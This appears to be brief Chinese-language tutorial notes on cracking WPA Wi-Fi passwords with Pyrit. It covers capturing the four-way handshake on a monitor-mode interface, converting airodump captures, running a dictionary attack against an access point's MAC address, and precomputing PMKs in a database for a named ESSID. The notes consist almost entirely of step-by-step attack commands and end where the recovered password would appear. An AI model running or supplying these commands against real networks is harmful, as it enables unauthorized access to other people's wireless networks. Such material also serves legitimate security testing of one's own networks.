优势:
可运用GPU的运算加速生成PMK
本身支持抓包获取四步五首过程,无需用Airodump抓包
也支持传统的读取airodump抓包获取四步握手的方式
只抓取WAP四次握手过程包
pyrit -r wlan0mon -o wpapyrit.cap sripLive# -o 生成握手信息 sripLive 剔除不需要的数据包
pyrit -r wpapyrit.cap analyze进行分析查看是否有握手信息
也可从airodump抓握手包导入并筛选(airodump抓到的包和pyrit格式不一样,需要在使用之前进行数据转换)
pyrit -r wpa.cap -o wpapyrit.cap strip
使用密码字典直接分析(速度比较慢)
pyrit -r wpapyrit.cap -i /usr/share/john/password.lst -b 00:11:22:33:44:55 attack_passthrough#-r 使用的握手包 -b AP的MAC地址
使用数据库破解:
1.查看默认数据库状态:pyrit eval
2.导入密码字典(自动剔除不合法密码): pyrit -i password.lst import passwords
3.指定ESSID:pyrit -e TP_Link722 create essid
4.计算PMK: pyrit batch (默认启用GPU)
5.分析密码:pyrit -r wpapyrit.cap -b 00:11:22:33:44:55 attack.db
得出最终的密码: